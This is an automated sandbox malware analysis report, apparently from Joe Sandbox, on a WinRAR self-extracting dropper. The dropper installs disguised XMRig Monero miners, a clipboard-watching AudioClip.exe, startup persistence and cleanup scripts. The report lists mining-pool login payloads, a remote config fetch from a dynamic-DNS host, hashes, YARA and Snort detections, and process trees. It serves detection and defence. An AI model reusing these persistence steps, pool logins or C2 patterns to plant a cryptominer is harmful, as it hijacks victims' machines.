Source: global traffic	TCP traffic: 192.168.2.5:49824 -> 64.235.37.55:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"8aqxf1xtq3bbvaxy3ubmz2rmfaewvfjqsndqaukcq81zabivlj4xxavjnzflulvden21zttz1sjwfe555femgw7eaoni354","pass":"x","agent":"xmrig/6.17.0 (windows nt 10.0; win64; x64) libuv/1.43.0 msvc/2019","rigid":"xmrig","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt","astrobwt/v2","ghostrider"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:49829 -> 200.83.148.79:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"d06ed635-68f6-4e9a-955c-4899f5f57b9a","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:49844 -> 200.83.148.79:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"d06ed635-68f6-4e9a-955c-4899f5f57b9a","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}.

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Unpacked PE file: 22.2.AudioClip.exe.df0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Unpacked PE file: 32.2.AudioClip.exe.c80000.0.unpack

Source: 2rVBokoc2C.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: 2rVBokoc2C.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 2rVBokoc2C.exe
Source:	Binary string: cvtres.pdbAQnS source: cvtres.exe, 00000021.00000003.612189049.0000000003120000.00000004.00001000.00020000.00000000.sdmp, svhproxy.33.dr
Source:	Binary string: c:\Users\miki\Documents\Visual Studio 2012\Projects\DeskRindj\DeskRindj\obj\Debug\DeskRindj.pdb source: AudioClip.exe, 00000016.00000002.745607167.0000000000DF2000.00000002.00000001.01000000.0000000B.sdmp, AudioClip.exe, 00000020.00000002.529122119.0000000000C82000.00000002.00000001.01000000.00000011.sdmp, AudioClip.exe.22.dr, AudioClip.exe.0.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 2rVBokoc2C.exe, 00000000.00000003.428989136.00000000065D0000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
Source:	Binary string: cvtres.pdb source: cvtres.exe, 00000021.00000003.612189049.0000000003120000.00000004.00001000.00020000.00000000.sdmp, svhproxy.33.dr

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BAA534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00BAA534
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBB820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00BBB820
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BCA928 FindFirstFileExA,	0_2_00BCA928

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\notepad.exe

Network Connect: 200.83.148.79 3333

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2845601 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2020-11-20 2) 192.168.2.5:49818 -> 64.235.37.55:3333
Source: Traffic	Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.5:49818 -> 64.235.37.55:3333
Source: Traffic	Snort IDS: 2845601 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2020-11-20 2) 192.168.2.5:49824 -> 64.235.37.55:3333
Source: Traffic	Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.5:49824 -> 64.235.37.55:3333
Source: Traffic	Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.5:49829 -> 200.83.148.79:3333
Source: Traffic	Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.5:49844 -> 200.83.148.79:3333

Source: Joe Sandbox View

ASN Name: VTRBANDAANCHASACL VTRBANDAANCHASACL

Source: global traffic	TCP traffic: 192.168.2.5:49818 -> 64.235.37.55:3333
Source: global traffic	TCP traffic: 192.168.2.5:49829 -> 200.83.148.79:3333

Source: 2rVBokoc2C.exe, 00000000.00000003.428989136.00000000065D0000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 2rVBokoc2C.exe, 00000000.00000003.428989136.00000000065D0000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 2rVBokoc2C.exe, 00000000.00000003.428989136.00000000065D0000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: 2rVBokoc2C.exe, 00000000.00000003.428989136.00000000065D0000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 0000001A.00000002.777725549.000001B77269C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001A.00000002.775323442.000001B772600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: AudioClip.exe, 00000016.00000002.756645107.000000000341B000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529544830.000000000333B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://web1705.ath.cx/log.php
Source: AudioClip.exe, 00000016.00000002.753618041.00000000016D0000.00000004.08000000.00040000.00000000.sdmp, AudioClip.exe, 00000016.00000002.756623219.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000016.00000002.756645107.000000000341B000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529544830.000000000333B000.00000004.00000800.00020000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529469024.0000000001360000.00000004.08000000.00040000.00000000.sdmp, AudioClip.exe, 00000020.00000002.529527884.0000000003311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://web1705.ath.cx/log.phpM
Source: services.exe, 0000000E.00000002.551526823.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000015.00000002.656226894.000000000364B000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000021.00000000.537477887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000026.00000000.549439536.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://RtlGetVersionntdll.dll
Source: 2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe, 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe.0.dr	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: 2rVBokoc2C.exe, 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe, 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, wininit.exe.0.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: wininit.exe.0.dr	String found in binary or memory: https://xmrig.com/wizard

Source: unknown

DNS traffic detected: queries for: soloformin.linkpc.net

Source: global traffic

HTTP traffic detected: GET /1/config.txt HTTP/1.1Accept: text/*, application/exe, application/zlib, application/gzip, application/applefileUser-Agent: WinInetGet/0.1Host: soloformin.linkpc.netConnection: Keep-AliveCache-Control: no-cache

Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 36.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 30.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

.NET source code contains very large strings

Source: AudioClip.exe.0.dr, Program.cs	Long String: Length: 12553
Source: AudioClip.exe.22.dr, Program.cs	Long String: Length: 12553
Source: 22.2.AudioClip.exe.df0000.0.unpack, Program.cs	Long String: Length: 12553
Source: 22.0.AudioClip.exe.df0000.0.unpack, Program.cs	Long String: Length: 12553
Source: 32.2.AudioClip.exe.c80000.0.unpack, Program.cs	Long String: Length: 12553
Source: 32.0.AudioClip.exe.c80000.0.unpack, Program.cs	Long String: Length: 12553

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BB65B6	0_2_00BB65B6
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BA8525	0_2_00BA8525
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BB702F	0_2_00BB702F
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BA404E	0_2_00BA404E
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BAE1E0	0_2_00BAE1E0
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BC0146	0_2_00BC0146
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BA326D	0_2_00BA326D
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BC457A	0_2_00BC457A
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BC055E	0_2_00BC055E
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BC47A9	0_2_00BC47A9
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BAE7E0	0_2_00BAE7E0
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BA27D4	0_2_00BA27D4
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BB3731	0_2_00BB3731
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BAF8A8	0_2_00BAF8A8
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BB39AC	0_2_00BB39AC
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BC0993	0_2_00BC0993
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BB69EB	0_2_00BB69EB
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BCCA20	0_2_00BCCA20
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BB5BE7	0_2_00BB5BE7
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BB3CDD	0_2_00BB3CDD
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BAEC54	0_2_00BAEC54
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBFC4A	0_2_00BBFC4A
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BADDAC	0_2_00BADDAC
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BC0DC8	0_2_00BC0DC8
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BABD53	0_2_00BABD53
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BCCECE	0_2_00BCCECE
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BD0FD4	0_2_00BD0FD4
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BA5F0C	0_2_00BA5F0C
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Code function: 14_2_00DE8DCD	14_2_00DE8DCD
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Code function: 14_2_00C13A92	14_2_00C13A92
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Code function: 14_2_05DD0747	14_2_05DD0747

Source: 2rVBokoc2C.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: services.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wininit.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

File created: C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys

Jump to behavior

Source: wininit.exe.0.dr

Static PE information: Number of sections : 11 > 10

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe 9A0A3E5296478E7822D92BF8B2C4AF3E18203C6E65A47BE5C65594F376576733
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: 2rVBokoc2C.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 36.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 36.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 36.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 30.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 30.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 30.0.wininit.exe.7ff690540000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000000.00000003.429825827.000000000697A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: 2rVBokoc2C.exe PID: 7056, type: MEMORYSTR	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: 2rVBokoc2C.exe PID: 7056, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: wininit.exe PID: 7088, type: MEMORYSTR	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: wininit.exe PID: 7088, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: wininit.exe PID: 6084, type: MEMORYSTR	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: wininit.exe PID: 6084, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: cvtres.exe PID: 6584, type: MEMORYSTR	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, type: DROPPED	Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: C:\Windows\SysWOW64\wscript.exe

File deleted: C:\Windows\Temp\MpCmdRun.log

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: String function: 00BBE0E4 appears 35 times
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: String function: 00BBEB60 appears 31 times
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: String function: 00BBE1C0 appears 52 times

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BA7165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00BA7165

Source: 2rVBokoc2C.exe, 00000000.00000003.428989136.00000000065D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinRing0.sys2 vs 2rVBokoc2C.exe
Source: 2rVBokoc2C.exe, 00000000.00000003.430505540.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamexmrig.exe, vs 2rVBokoc2C.exe

Source: services.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2rVBokoc2C.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: services.exe.lnk.0.dr	LNK file: ..\..\..\..\..\01Atodo\services.exe
Source: start.vbs.lnk.0.dr	LNK file: ..\..\..\..\..\01Atodo\start.vbs

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

File created: C:\Users\user\AppData\Roaming\01Atodo

Jump to behavior

Source: WinRing0x64.sys.0.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.adwa.expl.evad.mine.winEXE@69/27@4/5

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BA6E5E GetLastError,FormatMessageW,

0_2_00BA6E5E

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Code function: 0_2_00BB9D9A FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00BB9D9A

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\install.vbs"

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\del.bat" "

Source: 2rVBokoc2C.exe	Virustotal: Detection: 67%
Source: 2rVBokoc2C.exe	Metadefender: Detection: 28%
Source: 2rVBokoc2C.exe	ReversingLabs: Detection: 88%

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

File read: C:\Users\user\Desktop\2rVBokoc2C.exe

Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2rVBokoc2C.exe "C:\Users\user\Desktop\2rVBokoc2C.exe"
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\del.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\01Atodo\services.exe "C:\Users\user\AppData\Roaming\01Atodo\services.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\delreg.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killroaming.vbs"
